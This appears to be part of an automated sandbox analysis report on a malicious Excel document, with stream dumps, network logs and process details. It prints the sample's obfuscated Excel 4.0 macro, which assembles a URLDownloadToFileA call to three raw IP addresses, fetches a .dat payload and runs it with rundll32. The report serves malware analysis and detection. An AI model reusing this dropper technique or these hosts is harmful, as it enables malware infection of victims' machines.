                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/o
                                                                                                                                                File Type:empty
                                                                                                                                                Stream Size:0
                                                                                                                                                Entropy:0.0
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:
                                                                                                                                                Data Raw:
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4263
                                                                                                                                                Entropy:4.38205341073
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1024
                                                                                                                                                Entropy:6.73319737871
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                05/04/21-18:59:35.709069TCP1201ATTACK-RESPONSES 403 Forbidden804916791.211.91.81192.168.2.22
                                                                                                                                                05/04/21-18:59:36.421322TCP1201ATTACK-RESPONSES 403 Forbidden80491685.34.179.36192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 19:05:21.936115980 CEST4971380192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 19:05:22.019757986 CEST804971391.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.019880056 CEST4971380192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 19:05:22.020447969 CEST4971380192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 19:05:22.104100943 CEST804971391.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.168222904 CEST804971391.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.169650078 CEST4971380192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 19:05:22.174801111 CEST4971480192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 19:05:22.320591927 CEST80497145.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.320765972 CEST4971480192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 19:05:22.322101116 CEST4971480192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 19:05:22.467993975 CEST80497145.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.875408888 CEST80497145.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.878314972 CEST4971480192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 19:05:22.888240099 CEST4971580192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 19:05:25.944847107 CEST4971580192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 19:05:32.039170980 CEST4971580192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 19:06:27.168829918 CEST804971391.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 19:06:27.169385910 CEST4971380192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 19:06:27.875399113 CEST80497145.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 19:06:27.876745939 CEST4971480192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 19:07:03.469186068 CEST4971480192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 19:07:03.470710039 CEST4971380192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 19:07:03.554588079 CEST804971391.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 19:07:03.615153074 CEST80497145.34.179.36192.168.2.5

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 19:05:00.779759884 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:00.836710930 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:00.883723021 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:00.906924009 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:00.940664053 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:00.955792904 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:02.954732895 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:03.006244898 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:03.784965992 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:03.833733082 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:04.772622108 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:04.822496891 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:05.222925901 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:05.285095930 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:06.022656918 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:06.074182034 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:07.156652927 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:07.208163977 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:12.427881002 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:12.480506897 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:13.513995886 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:13.603142023 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:14.206073046 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:14.257721901 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:14.537086964 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:14.604374886 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:15.522897005 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:15.584919930 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:16.538016081 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:16.608449936 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:17.324163914 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:17.372785091 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:18.571381092 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:18.628405094 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:19.732948065 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:19.784548998 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:20.669042110 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:20.717664003 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:22.733537912 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:22.790704012 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:25.664031029 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:25.726377964 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:36.113298893 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:36.162009001 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:45.195409060 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:45.256788015 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:05:56.495425940 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:05:56.545377970 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:06:18.147820950 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:06:18.196563005 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:06:25.228718042 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:06:25.286515951 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:06:37.983840942 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:06:38.049559116 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:06:54.016953945 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:06:54.068481922 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 19:06:56.589683056 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 19:06:56.660690069 CEST53503948.8.8.8192.168.2.5

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 91.211.91.81
                                                                                                                                                • 5.34.179.36

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.54971391.211.91.8180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:05:22.020447969 CEST648OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 91.211.91.81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:05:22.168222904 CEST659INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:05:22 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.5497145.34.179.3680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 19:05:22.322101116 CEST660OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 5.34.179.36
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 19:05:22.875408888 CEST672INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 17:05:22 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:19:05:12
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x380000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >